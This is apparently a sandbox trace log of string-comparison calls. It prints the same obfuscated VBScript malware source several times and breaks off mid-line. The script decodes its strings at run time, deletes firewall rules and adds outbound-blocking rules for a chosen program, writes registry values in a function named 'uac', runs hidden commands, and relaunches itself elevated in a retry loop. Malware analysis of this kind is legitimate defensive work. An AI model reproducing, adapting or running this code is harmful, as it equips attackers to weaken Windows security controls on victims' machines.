NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.316] wcsncmp (_String1="sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.316] wcsncmp (_String1="r\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 101 [0226.316] wcsncmp (_String1="\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 30 [0226.316] wcsncmp (_String1="\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 